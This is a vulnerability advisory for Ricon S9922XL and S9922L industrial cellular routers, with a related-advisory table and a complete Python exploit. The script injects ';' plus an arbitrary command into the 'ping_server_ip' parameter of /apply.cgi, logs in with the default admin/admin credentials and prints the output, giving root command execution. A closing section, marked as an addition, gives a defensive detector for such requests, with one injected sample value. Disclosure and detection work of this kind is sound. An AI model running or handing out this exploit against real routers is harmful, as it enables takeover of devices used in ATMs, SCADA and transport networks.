Ricon Industrial Cellular Router S9922XL Remote Command Execution

šŸ—“ļøĀ 04 Jul 2021Ā 00:00:00Reported byĀ Gjoko KrsticTypeĀ 
zeroscience
Ā zeroscience
šŸ”—Ā www.zeroscience.mkšŸ‘Ā 448Ā Views

Ricon Industrial Cellular Router S9922XL and S9922L, firmware 16.10.3: an authenticated OS command injection in the 'ping_server_ip' POST parameter allows remote command execution as the admin (root) user.

Related

| Reporter | Title | Published |
|---|---|---|
| Circl | CVE-2022-0365 | 16 Apr 2025 16:56 |
| CNNVD | Ricon Industrial Cellular Router S9922L OS Command Injection Vulnerability | 1 Feb 2022 00:00 |
| CNVD | Ricon Mobile Ricon Industrial Cellular Router S9922L and S9922XL OS Command Injection Vulnerability | 10 Feb 2022 00:00 |
| CVE | CVE-2022-0365 | 4 Feb 2022 22:29 |
| Cvelist | CVE-2022-0365 Ricon Mobile, Inc. | 4 Feb 2022 22:29 |
| EUVD | EUVD-2022-15520 | 3 Oct 2025 20:07 |
| ICS | Ricon Mobile Industrial Cellular Router | 1 Feb 2022 00:00 |
| NVD | CVE-2022-0365 | 4 Feb 2022 23:15 |
| OSV | CVE-2022-0365 | 4 Feb 2022 23:15 |
| Prion | Command injection | 4 Feb 2022 23:15 |

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
#                   Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\>python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
#            WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#

import requests,sys,re

if len(sys.argv)<3:
    print("Ricon Industrial Routers RCE")
    print("Usage: ./ricon.py [ip] [cmd]")
    sys.exit(17)
else:
    ipaddr=sys.argv[1]
    execmd=sys.argv[2]

data={'submit_class'  :'admin',
      'submit_button' :'netTest',
      'submit_type'   :'',
      'action'        :'Apply',
      'change_action' :'',
      'is_ping'       :'0',
      'ping_server_ip':';'+execmd}

htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)
```
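
A defender's view of the request the script above sends, as an added example that is not part of the original advisory: it checks captured POST bodies to /apply.cgi and flags any ping_server_ip value that is not a bare IP address or hostname. The sample traffic, addresses and function names are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# One DNS label: letters, digits, hyphens; no leading or trailing hyphen.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def is_plain_ping_target(value: str) -> bool:
    """True only when value is a bare IP address or hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        # fullmatch: a trailing newline or any extra byte fails the check
        return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None


def suspicious_ping_posts(posts):
    """Return (source, value) for each /apply.cgi POST whose ping_server_ip
    carries anything beyond an address, e.g. shell metacharacters."""
    hits = []
    for source, path, body in posts:
        if path != "/apply.cgi":
            continue
        form = parse_qs(body)  # URL-decodes, so %3B is seen as ';'
        for value in form.get("ping_server_ip", []):
            if not is_plain_ping_target(value):
                hits.append((source, value))
    return hits


# Constructed sample traffic: (source IP, request path, raw POST body).
_COMMON = "submit_class=admin&submit_button=netTest&action=Apply&is_ping=0"
SAMPLE_POSTS = [
    ("10.0.0.5", "/apply.cgi", _COMMON + "&ping_server_ip=8.8.8.8"),
    ("10.0.0.9", "/apply.cgi", _COMMON + "&ping_server_ip=%3Bid"),
    ("10.0.0.5", "/apply.cgi", _COMMON + "&ping_server_ip=ntp.example.org"),
    ("10.0.0.6", "/apply.cgi", _COMMON + "&ping_server_ip=2001%3Adb8%3A%3A1"),
]

if __name__ == "__main__":
    for source, value in suspicious_ping_posts(SAMPLE_POSTS):
        print(f"ALERT {source}: ping_server_ip={value!r}")
```

The same allow-list check applies on the server side: a ping target that fails it should be rejected before it reaches any command line.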
